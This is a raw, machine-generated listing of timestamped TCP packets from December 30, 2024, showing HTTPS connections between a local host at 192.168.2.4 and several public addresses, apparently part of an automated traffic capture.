                                                                  Dec 30, 2024 22:42:16.193732977 CET49739443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:16.194113970 CET44349740188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:16.194160938 CET49740443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:16.213149071 CET49740443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:16.213249922 CET44349740188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:16.214035988 CET49740443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:16.214061022 CET44349740188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:16.214860916 CET49739443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:16.214972973 CET44349739188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:16.265357971 CET49740443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:16.265396118 CET49739443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:16.265413046 CET44349739188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:16.309480906 CET49739443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:16.351749897 CET44349740188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:16.351855040 CET44349740188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:16.351878881 CET44349740188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:16.351906061 CET44349740188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:16.351907015 CET49740443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:16.351946115 CET44349740188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:16.351969004 CET49740443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:16.351985931 CET44349740188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:16.352013111 CET44349740188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:16.352026939 CET49740443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:16.352036953 CET44349740188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:16.352076054 CET49740443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:16.352325916 CET44349740188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:16.352421045 CET44349740188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:16.352464914 CET49740443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:16.356633902 CET49740443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:16.356674910 CET44349740188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:16.356688023 CET49740443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:16.356719971 CET49740443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:16.364345074 CET49739443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:16.366477966 CET49741443192.168.2.435.190.80.1
                                                                  Dec 30, 2024 22:42:16.366518021 CET4434974135.190.80.1192.168.2.4
                                                                  Dec 30, 2024 22:42:16.366585016 CET49741443192.168.2.435.190.80.1
                                                                  Dec 30, 2024 22:42:16.366880894 CET49741443192.168.2.435.190.80.1
                                                                  Dec 30, 2024 22:42:16.366894007 CET4434974135.190.80.1192.168.2.4
                                                                  Dec 30, 2024 22:42:16.411329985 CET44349739188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:16.494960070 CET44349739188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:16.495088100 CET44349739188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:16.495134115 CET44349739188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:16.495178938 CET44349739188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:16.495210886 CET49739443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:16.495233059 CET44349739188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:16.495263100 CET49739443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:16.495358944 CET44349739188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:16.495564938 CET49739443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:16.495580912 CET44349739188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:16.497756004 CET44349739188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:16.497863054 CET44349739188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:16.497947931 CET49739443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:16.497947931 CET49739443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:16.502804041 CET49739443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:16.502824068 CET44349739188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:16.577545881 CET49743443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:16.577591896 CET44349743188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:16.577835083 CET49743443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:16.578794003 CET49743443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:16.578805923 CET44349743188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:16.839585066 CET4434974135.190.80.1192.168.2.4
                                                                  Dec 30, 2024 22:42:16.839993000 CET49741443192.168.2.435.190.80.1
                                                                  Dec 30, 2024 22:42:16.840028048 CET4434974135.190.80.1192.168.2.4
                                                                  Dec 30, 2024 22:42:16.840949059 CET4434974135.190.80.1192.168.2.4
                                                                  Dec 30, 2024 22:42:16.841089964 CET49741443192.168.2.435.190.80.1
                                                                  Dec 30, 2024 22:42:16.842401028 CET49741443192.168.2.435.190.80.1
                                                                  Dec 30, 2024 22:42:16.842401028 CET49741443192.168.2.435.190.80.1
                                                                  Dec 30, 2024 22:42:16.842412949 CET4434974135.190.80.1192.168.2.4
                                                                  Dec 30, 2024 22:42:16.842453957 CET4434974135.190.80.1192.168.2.4
                                                                  Dec 30, 2024 22:42:16.889935017 CET49741443192.168.2.435.190.80.1
                                                                  Dec 30, 2024 22:42:16.889961004 CET4434974135.190.80.1192.168.2.4
                                                                  Dec 30, 2024 22:42:16.936144114 CET49741443192.168.2.435.190.80.1
                                                                  Dec 30, 2024 22:42:16.964287996 CET4434974135.190.80.1192.168.2.4
                                                                  Dec 30, 2024 22:42:16.964359045 CET4434974135.190.80.1192.168.2.4
                                                                  Dec 30, 2024 22:42:16.965286970 CET49741443192.168.2.435.190.80.1
                                                                  Dec 30, 2024 22:42:16.965286970 CET49745443192.168.2.435.190.80.1
                                                                  Dec 30, 2024 22:42:16.965298891 CET4434974135.190.80.1192.168.2.4
                                                                  Dec 30, 2024 22:42:16.965329885 CET4434974535.190.80.1192.168.2.4
                                                                  Dec 30, 2024 22:42:16.965348005 CET49741443192.168.2.435.190.80.1
                                                                  Dec 30, 2024 22:42:16.965399981 CET49745443192.168.2.435.190.80.1
                                                                  Dec 30, 2024 22:42:16.965399981 CET49741443192.168.2.435.190.80.1
                                                                  Dec 30, 2024 22:42:16.965949059 CET49745443192.168.2.435.190.80.1
                                                                  Dec 30, 2024 22:42:16.965961933 CET4434974535.190.80.1192.168.2.4
                                                                  Dec 30, 2024 22:42:17.039763927 CET44349743188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:17.040144920 CET49743443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:17.040157080 CET44349743188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:17.040616989 CET44349743188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:17.041169882 CET49743443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:17.041169882 CET49743443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:17.041182995 CET44349743188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:17.041248083 CET44349743188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:17.093199015 CET49743443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:17.178451061 CET44349743188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:17.178499937 CET44349743188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:17.178544044 CET44349743188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:17.178569078 CET44349743188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:17.178597927 CET44349743188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:17.178627968 CET49743443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:17.178630114 CET44349743188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:17.178654909 CET44349743188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:17.178680897 CET49743443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:17.178687096 CET44349743188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:17.178713083 CET44349743188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:17.178733110 CET49743443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:17.178736925 CET44349743188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:17.178937912 CET49743443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:17.183166981 CET44349743188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:17.230798006 CET49743443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:17.230820894 CET44349743188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:17.264991045 CET44349743188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:17.265024900 CET44349743188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:17.265166998 CET44349743188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:17.265191078 CET44349743188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:17.265197039 CET49743443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:17.265221119 CET44349743188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:17.265240908 CET49743443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:17.265619040 CET44349743188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:17.265641928 CET49743443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:17.265647888 CET44349743188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:17.265842915 CET44349743188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:17.265873909 CET49743443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:17.265878916 CET44349743188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:17.265918970 CET44349743188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:17.265938997 CET49743443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:17.265944004 CET44349743188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:17.265986919 CET44349743188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:17.266014099 CET49743443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:17.266017914 CET44349743188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:17.266822100 CET44349743188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:17.266858101 CET44349743188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:17.266881943 CET49743443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:17.266886950 CET44349743188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:17.266911030 CET49743443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:17.266926050 CET44349743188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:17.266949892 CET44349743188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:17.266973972 CET49743443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:17.266978025 CET44349743188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:17.267916918 CET44349743188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:17.267941952 CET49743443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:17.267949104 CET44349743188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:17.267959118 CET44349743188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:17.269740105 CET44349743188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:17.269771099 CET44349743188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:17.269771099 CET49743443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:17.269782066 CET44349743188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:17.269841909 CET49743443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:17.269841909 CET49743443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:17.351914883 CET44349743188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:17.351980925 CET44349743188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:17.352020025 CET44349743188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:17.352058887 CET44349743188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:17.352091074 CET49743443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:17.352114916 CET44349743188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:17.352139950 CET49743443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:17.352245092 CET44349743188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:17.352305889 CET49743443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:17.352310896 CET44349743188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:17.352524042 CET49743443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:17.352543116 CET44349743188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:17.352597952 CET49743443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:17.352602959 CET44349743188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:17.352613926 CET44349743188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:17.352654934 CET44349743188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:17.352680922 CET49743443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:17.352684021 CET44349743188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:17.352694035 CET44349743188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:17.352710009 CET49743443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:17.353166103 CET44349743188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:17.353193045 CET49743443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:17.353198051 CET44349743188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:17.353208065 CET44349743188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:17.353219032 CET49743443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:17.353295088 CET44349743188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:17.353318930 CET49743443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:17.353323936 CET44349743188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:17.353342056 CET44349743188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:17.353349924 CET49743443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:17.353363991 CET49743443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:17.353945017 CET44349743188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:17.353980064 CET44349743188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:17.354003906 CET49743443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:17.354012012 CET44349743188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:17.354051113 CET49743443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:17.354054928 CET44349743188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:17.354296923 CET49743443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:17.354300976 CET44349743188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:17.354501009 CET49743443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:17.389432907 CET49746443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:17.389471054 CET44349746188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:17.392159939 CET49746443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:17.392412901 CET49746443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:17.392424107 CET44349746188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:17.396657944 CET49747443192.168.2.4104.18.94.41
                                                                  Dec 30, 2024 22:42:17.396697044 CET44349747104.18.94.41192.168.2.4
                                                                  Dec 30, 2024 22:42:17.397402048 CET49747443192.168.2.4104.18.94.41
                                                                  Dec 30, 2024 22:42:17.402251005 CET49747443192.168.2.4104.18.94.41
                                                                  Dec 30, 2024 22:42:17.402260065 CET44349747104.18.94.41192.168.2.4
                                                                  Dec 30, 2024 22:42:17.418694973 CET4434974535.190.80.1192.168.2.4
                                                                  Dec 30, 2024 22:42:17.426795006 CET49745443192.168.2.435.190.80.1
                                                                  Dec 30, 2024 22:42:17.426803112 CET4434974535.190.80.1192.168.2.4
                                                                  Dec 30, 2024 22:42:17.427094936 CET4434974535.190.80.1192.168.2.4
                                                                  Dec 30, 2024 22:42:17.431420088 CET49745443192.168.2.435.190.80.1
                                                                  Dec 30, 2024 22:42:17.431420088 CET49745443192.168.2.435.190.80.1
                                                                  Dec 30, 2024 22:42:17.431430101 CET4434974535.190.80.1192.168.2.4
                                                                  Dec 30, 2024 22:42:17.431474924 CET4434974535.190.80.1192.168.2.4
                                                                  Dec 30, 2024 22:42:17.481693029 CET49745443192.168.2.435.190.80.1
                                                                  Dec 30, 2024 22:42:17.493091106 CET49748443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:17.493113041 CET44349748188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:17.493387938 CET49748443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:17.494488955 CET49748443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:17.494496107 CET44349748188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:17.545428991 CET49749443192.168.2.4188.114.97.3
                                                                  Dec 30, 2024 22:42:17.545500994 CET44349749188.114.97.3192.168.2.4
                                                                  Dec 30, 2024 22:42:17.545589924 CET49749443192.168.2.4188.114.97.3
                                                                  Dec 30, 2024 22:42:17.549179077 CET49749443192.168.2.4188.114.97.3
                                                                  Dec 30, 2024 22:42:17.549211025 CET44349749188.114.97.3192.168.2.4
                                                                  Dec 30, 2024 22:42:17.556472063 CET4434974535.190.80.1192.168.2.4
                                                                  Dec 30, 2024 22:42:17.556529999 CET4434974535.190.80.1192.168.2.4
                                                                  Dec 30, 2024 22:42:17.556572914 CET49745443192.168.2.435.190.80.1
                                                                  Dec 30, 2024 22:42:17.556849957 CET49745443192.168.2.435.190.80.1
                                                                  Dec 30, 2024 22:42:17.556857109 CET4434974535.190.80.1192.168.2.4
                                                                  Dec 30, 2024 22:42:17.850882053 CET44349746188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:17.877321959 CET44349747104.18.94.41192.168.2.4
                                                                  Dec 30, 2024 22:42:17.896637917 CET49747443192.168.2.4104.18.94.41
                                                                  Dec 30, 2024 22:42:17.896676064 CET44349747104.18.94.41192.168.2.4
                                                                  Dec 30, 2024 22:42:17.896713018 CET49746443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:17.896738052 CET44349746188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:17.897222996 CET44349746188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:17.898363113 CET44349747104.18.94.41192.168.2.4
                                                                  Dec 30, 2024 22:42:17.898459911 CET49747443192.168.2.4104.18.94.41
                                                                  Dec 30, 2024 22:42:17.917731047 CET49746443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:17.917886019 CET44349746188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:17.918097973 CET49746443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:17.918133020 CET49746443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:17.918174028 CET44349746188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:17.918745041 CET49747443192.168.2.4104.18.94.41
                                                                  Dec 30, 2024 22:42:17.918869972 CET44349747104.18.94.41192.168.2.4
                                                                  Dec 30, 2024 22:42:17.918996096 CET49747443192.168.2.4104.18.94.41
                                                                  Dec 30, 2024 22:42:17.919006109 CET44349747104.18.94.41192.168.2.4
                                                                  Dec 30, 2024 22:42:17.969552040 CET49747443192.168.2.4104.18.94.41
                                                                  Dec 30, 2024 22:42:17.970125914 CET44349748188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:17.970453024 CET49748443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:17.970484018 CET44349748188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:17.970778942 CET44349748188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:17.971173048 CET49748443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:17.971236944 CET44349748188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:17.971343040 CET49748443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:18.019330978 CET44349748188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:18.029689074 CET44349747104.18.94.41192.168.2.4
                                                                  Dec 30, 2024 22:42:18.029733896 CET44349747104.18.94.41192.168.2.4
                                                                  Dec 30, 2024 22:42:18.029755116 CET44349747104.18.94.41192.168.2.4
                                                                  Dec 30, 2024 22:42:18.029774904 CET44349747104.18.94.41192.168.2.4
                                                                  Dec 30, 2024 22:42:18.029777050 CET49747443192.168.2.4104.18.94.41
                                                                  Dec 30, 2024 22:42:18.029788017 CET44349747104.18.94.41192.168.2.4
                                                                  Dec 30, 2024 22:42:18.029824018 CET44349747104.18.94.41192.168.2.4
                                                                  Dec 30, 2024 22:42:18.029831886 CET49747443192.168.2.4104.18.94.41
                                                                  Dec 30, 2024 22:42:18.029840946 CET44349747104.18.94.41192.168.2.4
                                                                  Dec 30, 2024 22:42:18.029865980 CET49747443192.168.2.4104.18.94.41
                                                                  Dec 30, 2024 22:42:18.030373096 CET44349747104.18.94.41192.168.2.4
                                                                  Dec 30, 2024 22:42:18.030400991 CET44349747104.18.94.41192.168.2.4
                                                                  Dec 30, 2024 22:42:18.030416012 CET49747443192.168.2.4104.18.94.41
                                                                  Dec 30, 2024 22:42:18.030421972 CET44349747104.18.94.41192.168.2.4
                                                                  Dec 30, 2024 22:42:18.030469894 CET49747443192.168.2.4104.18.94.41
                                                                  Dec 30, 2024 22:42:18.030474901 CET44349747104.18.94.41192.168.2.4
                                                                  Dec 30, 2024 22:42:18.034508944 CET44349747104.18.94.41192.168.2.4
                                                                  Dec 30, 2024 22:42:18.034568071 CET49747443192.168.2.4104.18.94.41
                                                                  Dec 30, 2024 22:42:18.034573078 CET44349747104.18.94.41192.168.2.4
                                                                  Dec 30, 2024 22:42:18.035442114 CET44349746188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:18.035475969 CET44349746188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:18.035499096 CET44349746188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:18.035514116 CET49746443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:18.035531998 CET44349746188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:18.035563946 CET44349746188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:18.035574913 CET49746443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:18.035583019 CET44349746188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:18.035621881 CET49746443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:18.035748959 CET44349746188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:18.036031008 CET44349746188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:18.036067963 CET49746443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:18.036077976 CET44349746188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:18.038903952 CET44349749188.114.97.3192.168.2.4
                                                                  Dec 30, 2024 22:42:18.039185047 CET49749443192.168.2.4188.114.97.3
                                                                  Dec 30, 2024 22:42:18.039205074 CET44349749188.114.97.3192.168.2.4
                                                                  Dec 30, 2024 22:42:18.040360928 CET44349749188.114.97.3192.168.2.4
                                                                  Dec 30, 2024 22:42:18.040422916 CET49749443192.168.2.4188.114.97.3
                                                                  Dec 30, 2024 22:42:18.040611982 CET44349746188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:18.040641069 CET44349746188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:18.040653944 CET49746443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:18.040666103 CET44349746188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:18.040694952 CET44349746188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:18.040699005 CET49746443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:18.040735960 CET49746443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:18.041140079 CET49746443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:18.041165113 CET44349746188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:18.041888952 CET49749443192.168.2.4188.114.97.3
                                                                  Dec 30, 2024 22:42:18.041973114 CET44349749188.114.97.3192.168.2.4
                                                                  Dec 30, 2024 22:42:18.042062998 CET49749443192.168.2.4188.114.97.3
                                                                  Dec 30, 2024 22:42:18.042071104 CET44349749188.114.97.3192.168.2.4
                                                                  Dec 30, 2024 22:42:18.042278051 CET49749443192.168.2.4188.114.97.3
                                                                  Dec 30, 2024 22:42:18.042296886 CET49749443192.168.2.4188.114.97.3
                                                                  Dec 30, 2024 22:42:18.042874098 CET49750443192.168.2.4188.114.97.3
                                                                  Dec 30, 2024 22:42:18.042965889 CET44349750188.114.97.3192.168.2.4
                                                                  Dec 30, 2024 22:42:18.043040991 CET49750443192.168.2.4188.114.97.3
                                                                  Dec 30, 2024 22:42:18.043473959 CET49750443192.168.2.4188.114.97.3
                                                                  Dec 30, 2024 22:42:18.043503046 CET44349750188.114.97.3192.168.2.4
                                                                  Dec 30, 2024 22:42:18.064856052 CET49751443192.168.2.4188.114.97.3
                                                                  Dec 30, 2024 22:42:18.064899921 CET44349751188.114.97.3192.168.2.4
                                                                  Dec 30, 2024 22:42:18.064965010 CET49751443192.168.2.4188.114.97.3
                                                                  Dec 30, 2024 22:42:18.065248966 CET49751443192.168.2.4188.114.97.3
                                                                  Dec 30, 2024 22:42:18.065265894 CET44349751188.114.97.3192.168.2.4
                                                                  Dec 30, 2024 22:42:18.076706886 CET49747443192.168.2.4104.18.94.41
                                                                  Dec 30, 2024 22:42:18.118607998 CET44349747104.18.94.41192.168.2.4
                                                                  Dec 30, 2024 22:42:18.118658066 CET44349747104.18.94.41192.168.2.4
                                                                  Dec 30, 2024 22:42:18.118679047 CET44349747104.18.94.41192.168.2.4
                                                                  Dec 30, 2024 22:42:18.118700027 CET44349747104.18.94.41192.168.2.4
                                                                  Dec 30, 2024 22:42:18.118704081 CET49747443192.168.2.4104.18.94.41
                                                                  Dec 30, 2024 22:42:18.118721008 CET44349747104.18.94.41192.168.2.4
                                                                  Dec 30, 2024 22:42:18.118743896 CET49747443192.168.2.4104.18.94.41
                                                                  Dec 30, 2024 22:42:18.118947983 CET44349747104.18.94.41192.168.2.4
                                                                  Dec 30, 2024 22:42:18.118969917 CET44349747104.18.94.41192.168.2.4
                                                                  Dec 30, 2024 22:42:18.118994951 CET49747443192.168.2.4104.18.94.41
                                                                  Dec 30, 2024 22:42:18.118999958 CET44349747104.18.94.41192.168.2.4
                                                                  Dec 30, 2024 22:42:18.119020939 CET44349747104.18.94.41192.168.2.4
                                                                  Dec 30, 2024 22:42:18.119035006 CET49747443192.168.2.4104.18.94.41
                                                                  Dec 30, 2024 22:42:18.119039059 CET44349747104.18.94.41192.168.2.4
                                                                  Dec 30, 2024 22:42:18.119093895 CET49747443192.168.2.4104.18.94.41
                                                                  Dec 30, 2024 22:42:18.119883060 CET44349747104.18.94.41192.168.2.4
                                                                  Dec 30, 2024 22:42:18.119931936 CET44349747104.18.94.41192.168.2.4
                                                                  Dec 30, 2024 22:42:18.119955063 CET44349747104.18.94.41192.168.2.4
                                                                  Dec 30, 2024 22:42:18.119971991 CET49747443192.168.2.4104.18.94.41
                                                                  Dec 30, 2024 22:42:18.119976997 CET44349747104.18.94.41192.168.2.4
                                                                  Dec 30, 2024 22:42:18.119997978 CET44349747104.18.94.41192.168.2.4
                                                                  Dec 30, 2024 22:42:18.120021105 CET49747443192.168.2.4104.18.94.41
